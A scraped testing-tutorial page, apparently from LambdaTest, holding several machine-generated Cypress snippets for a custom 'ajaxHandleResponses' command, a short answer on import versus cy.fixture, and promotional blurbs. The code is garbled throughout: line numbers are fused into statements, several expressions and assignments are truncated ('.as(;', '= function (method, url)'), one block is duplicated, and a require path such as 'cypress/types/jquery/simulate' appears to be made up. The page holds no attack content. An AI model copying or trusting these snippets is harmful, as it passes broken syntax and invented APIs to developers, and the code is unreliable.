1describe('Test', function() {2 it('Test', function() {3 cy.server()4 cy.route('POST', '/comments').as('postComment')5 cy.get('.network-post').click()6 cy.wait('@postComment').then((xhr) => {7 expect(xhr.requestBody).to.include('email')8 expect(xhr.requestHeaders)'Content-Type')9 expect(xhr.responseBody)'name', 'Using POST in cy.route()')10 })11 })12})13Cypress.Commands.add('ajaxHandleResponses', (responses) => {14 cy.server()15 cy.route({16 onResponse: (xhr) => {17 xhrs.push(xhr)18 }19 })20 cy.wait(1000).then(() => {21 xhrs.forEach((xhr) => {22 const response = responses.find((r) => r.url === xhr.url)23 if (response) {24 }25 })26 })27})28describe('Test', function() {29 it('Test', function() {30 cy.ajaxHandleResponses([31 {32 responseBody: {33 }34 }35 cy.get('.network-post').click()36 cy.get('.network-post-error').should('be.visible')37 })38})39Cypress.Commands.add('ajaxHandleRequests', (requests) => {40 cy.server()41 cy.route({42 onRequest: (xhr) => {43 xhrs.push(xhr)44 }45 })46 cy.wait(1000).then(() => {47 xhrs.forEach((xhr) => {48 const request = requests.find((r) => r.url === xhr.url)
Using AI Code Generation
1describe('Test', function () {2 it('Test', function () {3 cy.server()4 cy.route('GET', '/comments/*').as('getComment')5 cy.get('.network-btn').click()6 cy.wait('@getComment').then((xhr) => {7 cy.wrap(xhr.responseBody).as('response')8 cy.get('@response').then((res) => {9 cy.log(res)10 })11 })12 })13})14Cypress.Commands.add('ajaxHandleResponses', (xhr) => {15 cy.wrap(xhr.responseBody).as('response')16 cy.get('@response').then((res) => {17 cy.log(res)18 })19})20describe('Test', function () {21 it('Test', function () {22 cy.server()23 cy.route('GET', '/comments/*').as('getComment')24 cy.get('.network-btn').click()25 cy.wait('@getComment').then((xhr) => {26 cy.ajaxHandleResponses(xhr)27 })28 })29})
Using AI Code Generation
1it('test', () => {2 cy.server();3 cy.route({4 response: {id: 1, title: 'delectus aut autem', completed: false},5 }).as('getTodo');6 cy.get('#button').click();7 cy.wait('@getTodo').then((xhr) => {8 cy.wrap(xhr).should('', 'status', 200);9 cy.wrap(xhr).its('responseBody').should('deep.equal', {id: 1, title: 'delectus aut autem', completed: false});10 });11});12Cypress.Commands.add('ajaxHandleResponses', (responses) => {13 cy.server();14 responses.forEach((response) => {15 cy.route({16 }).as(;17 });18});19it('test', () => {20 cy.ajaxHandleResponses([21 {22 response: {id: 1, title: 'delectus aut autem', completed: false},23 }24 ]);25 cy.get('#button').click();26 cy.wait('@getTodo').then((xhr) => {27 cy.wrap(xhr).should('', 'status', 200);28 cy.wrap(xhr).its('responseBody').should('deep.equal', {id: 1, title: 'delectus aut autem', completed: false});29 });30});31Cypress.Commands.add('ajaxHandleResponses', (responses) => {32 cy.server();33 responses.forEach((response) => {34 cy.route({
Using AI Code Generation
1describe('Test', () => {2 it('test', () => {3 cy.server()4 cy.wait('@post').then((xhr) => {5 xhr.response.body = {6 data: {7 },8 }9 })10 })11})12Cypress.on('window:before:load', (win) => {13 = function (method, url) {14 open.apply(this, arguments)15 }16 win.XMLHttpRequest.prototype.ajaxHandleResponses = function () {17 const { responseText } = this18 if (responseText) {19 const { responseURL } = this20 const route = Cypress.routes.find((route) => {21 if (route.method === 'GET' && route.url.test(responseURL)) {22 }23 })24 if (route) {25 route.handler(responseText)26 }27 }28 }29})30module.exports = (on, config) => {31 on('task', {32 log(message) {33 console.log(message)34 },35 })36}37Cypress.Commands.overwrite('visit', (originalFn, url, options) => {38 const visitOptions = {39 onBeforeLoad(win) {40 = function (method, url) {41 open.apply(this, arguments)42 }43 win.XMLHttpRequest.prototype.ajaxHandleResponses = function () {44 const { responseText } = this45 if (responseText) {46 const { responseURL } = this47 const route = Cypress.routes.find((route) => {
Using AI Code Generation
1describe('Cypress', () => {2 it('should be able to use ajaxHandleResponses method', () => {3 cy.server();4 cy.route('POST', '/api/endpoint').as('endpoint');5 cy.get('[data-cy=button]').click();6 cy.wait('@endpoint').then((xhr) => {7 cy.ajaxHandleResponses(xhr.responseBody, {8 'POST /api/endpoint': {9 },10 });11 });12 });13});14Cypress.Commands.add('ajaxHandleResponses', (response, responseMap) => {15 const { status, response: responseBody } = responseMap[response.method + ' ' + response.url] || {};16 if (status) {17 response.status = status;18 response.statusText = 'OK';19 response.body = responseBody;20 }21});
Using AI Code Generation
1const { ajaxHandleResponses } = require('cypress/types/jquery/simulate')2const { expect } = require('chai')3describe('Test', () => {4 it('Test', () => {5 cy.server()6 cy.route({7 response: { error: 'Hey comment not found' },8 }).as('updateComment')9 cy.get('.network-put').click()10 ajaxHandleResponses()11 cy.get('.network-put-comment').should('contain', 'Hey comment not found')12 })13})14const { ajaxHandleResponses } = require('cypress/types/jquery/simulate')15const { expect } = require('chai')16describe('Test', () => {17 it('Test', () => {18 cy.server()19 cy.route({20 response: { error: 'Hey comment not found' },21 }).as('updateComment')22 cy.get('.network-put').click()23 ajaxHandleResponses()24 cy.get('.network-put-comment').should('contain', 'Hey comment not found')25 })26})
Using AI Code Generation
1Cypress.Commands.add("ajaxHandleResponses", (response) => {2 if (response.status === 200) {3 cy.log("Response status is 200");4 } else if (response.status === 400) {5 cy.log("Response status is 400");6 } else if (response.status === 500) {7 cy.log("Response status is 500");8 } else {9 cy.log("Response status is not 200, 400 or 500");10 }11});12describe("Test", () => {13 it("Test Case", () => {14 cy.route2("**/v1/users", (req) => {15 req.reply((res) => {16 cy.ajaxHandleResponses(res);17 });18 });19 });20});21describe("Test", () => {22 it("Test Case", () => {23 cy.route2("**/v1/users", (req) => {24 req.reply((res) => {25 if (res.status === 200) {26 cy.log("Response status is 200");27 } else if (res.status === 400) {28 cy.log("Response status is 400");29 } else if (res.status === 500) {30 cy.log("Response status is 500");31 } else {32 cy.log("Response status is not 200, 400 or 500");33 }34 });35 });36 });37});38describe("Test", () => {39 it("Test Case", () => {40 cy.route2("**/v1/users", (req) => {41 req.reply((res) => {42 if (res.status === 200) {43 cy.log("Response status is 200");44 } else if (res.status === 400) {45 cy.log("Response status is 400");46 } else if (res.status === 500) {47 cy.log("Response status is 500");48 } else {49 cy.log("Response status is not 200, 400 or 500");50 }51 });52 });53 });54});55describe("Test", () => {56 it("Test Case", () => {
Using AI Code Generation
1cy.ajaxHandleResponses((xhr) => {2 if (xhr.url.includes('/api/v1')) {3 xhr.respond((res) => {4 res.send({5 body: {6 data: {7 },8 },9 });10 });11 }12});
Using AI Code Generation
1describe('Ajax request', () => {2 it('should wait for the request to complete', () => {3 cy.server()4 cy.route('POST', '/api/login').as('login')5 cy.get('[data-cy=username]').type('test')6 cy.get('[data-cy=password]').type('test')7 cy.get('[data-cy=submit]').click()8 cy.wait('@login').should((xhr) => {9 expect(xhr.status).to.equal(200)10 })11 })12})13Cypress.Commands.add('ajaxHandleResponses', (route) => {14 cy.server()15 cy.route('POST', route).as('login')16 cy.wait('@login').should((xhr) => {17 expect(xhr.status).to.equal(200)18 })19})20describe('Ajax request', () => {21 it('should wait for the request to complete', () => {22 cy.get('[data-cy=username]').type('test')23 cy.get('[data-cy=password]').type('test')24 cy.get('[data-cy=submit]').click()25 cy.ajaxHandleResponses('/api/login')26 })27})
What is the difference between import and cy.fixture in Cypress tests?
Change directory in Cypress using cy.exec()
How to remove whitespace from a string in Cypress
How to save a variable/text to use later in Cypress test?
Is it possible to select an anchor tag which contains a h1 which contains the text "Visit Site"?
Cypress loop execution order
Cypress Cucumber, how Get to data from page in one step and use it another scenario step
How to cancel a specific request in Cypress?
Cypress object vs JQuery object, role of cy.wrap function
Cypress - Controlling which tests to run - Using Cypress for seeding
Basically when you say import file from '../fixtures/filepath/file.json'
you can use the imported file in any of methods in the particular javascript file. Whereas if you say cy.fixture(file.json)
, then the fixture context will remain within that cy.fixture block and you cannot access anywhere/outside of that cy.fixture block. Please go through the below code and you will understand the significance of it.
I recommend to use import file from '../fixtures/filepath/file.json'
For example. Run the below code to understand.
import fixtureFile from './../fixtures/userData.json';
describe('$ suite', () => {
it('Filedata prints only in cy.fixture block', () => {
cy.fixture('userData.json').then(fileData => {
cy.log(JSON.stringify(fileData)); // You can access fileData only in this block.
cy.log(JSON.stringify(fileData)); //This says error because you are accessing out of cypress fixture context
it('This will print file data with import', () => {
it('This will also print file data with import', () => {
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Hola, testers! We are up with another round of exciting product updates to help scale your cross browser testing coverage. As spring cleaning looms, we’re presenting you product updates to put some spring in your testing workflow. Our development team has been working relentlessly to make our test execution platform more scalable and reliable than ever to accomplish all your testing requirements.
Agile development pushes out incremental software updates faster than traditional software releases. But the faster you release, the more tests you have to write and run – which becomes a burden as your accumulated test suites multiply. So a more intelligent approach to testing is needed for fast releases. This is where Smart Test Execution comes in.
If you were born in the 90s, you may be wondering where that browser is that you used for the first time to create HTML pages or browse the Internet. Even if you were born in the 00s, you probably didn’t use Internet Explorer until recently, except under particular circumstances, such as working on old computers in IT organizations, banks, etc. Nevertheless, I can say with my observation that Internet Explorer use declined rapidly among those using new computers.
Hey People! With the beginning of a new year, we are excited to announce a collection of new product updates! At LambdaTest, we’re committed to providing you with a comprehensive test execution platform to constantly improve the user experience and performance of your websites, web apps, and mobile apps. Our incredible team of developers came up with several new features and updates to spice up your workflow.
Cypress is a renowned Javascript-based open-source, easy-to-use end-to-end testing framework primarily used for testing web applications. Cypress is a relatively new player in the automation testing space and has been gaining much traction lately, as evidenced by the number of Forks (2.7K) and Stars (42.1K) for the project. LambdaTest’s Cypress Tutorial covers step-by-step guides that will help you learn from the basics till you run automation tests on LambdaTest.
You can elevate your expertise with end-to-end testing using the Cypress automation framework and stay one step ahead in your career by earning a Cypress certification. Check out our Cypress 101 Certification.
Watch this 3 hours of complete tutorial to learn the basics of Cypress and various Cypress commands with the Cypress testing at LambdaTest.
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